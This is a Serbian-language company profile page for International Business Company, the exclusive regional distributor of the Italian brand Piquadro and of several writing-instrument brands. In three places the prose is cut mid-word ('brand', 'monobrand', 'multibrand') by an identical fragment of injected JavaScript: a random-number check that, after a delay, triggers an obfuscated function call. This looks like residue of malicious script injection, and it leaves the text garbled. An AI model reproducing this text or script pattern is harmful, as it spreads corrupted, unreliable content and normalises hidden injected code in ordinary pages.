O kompaniji IBC

International Business Company doo je osnovana 11.11.1994. godine.

International Business Company je od 2000 godine ekskluzivni distributer i Agent kompanije PIQUADRO S.p.A. iz Italije za tržišta Srbije, Kosova i Metohije, Makedonije i Crne Gore.

PIQUADRO je premium brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and koji u svojoj ponudi ima širok asortiman poslovne i putne kožne galanterije u koji spadaju akt tašne, poslovne torbe, torbice, novčanici, futrole, koferi i drugo. Karakteristika brenda je italijanski dizajn praćen tehničkim karakteristikama implementiranim u svaki proizvod. Sa preko 180 monobrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and maloprodajnih objekata i 1.500 prodajnih mesta u multibrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and radnjama, PIQUADRO je prisutan u svim većim gradovima, ekskluzivnim robnim kućama i aerodromima u Evropi, Rusiji, Aziji, bliskom istoku.

Prodajni objekti

Eksluzivni distributer

International Business Company je takodje i distributer brenda ELMO & MONTEGRAPPA iz Italije koji je proizvodjač ekskluzivnog pisaćeg pribora, kao i brenda WALDMANN KG iz Nemačke, proizvodjača pisaćeg pribora od srebra.

International Business Company svoj odnos prema kupcima gradi već 20 godina kroz fleksibilnost, brzinu reagovanja na zahteve tržišta i profesionalizam.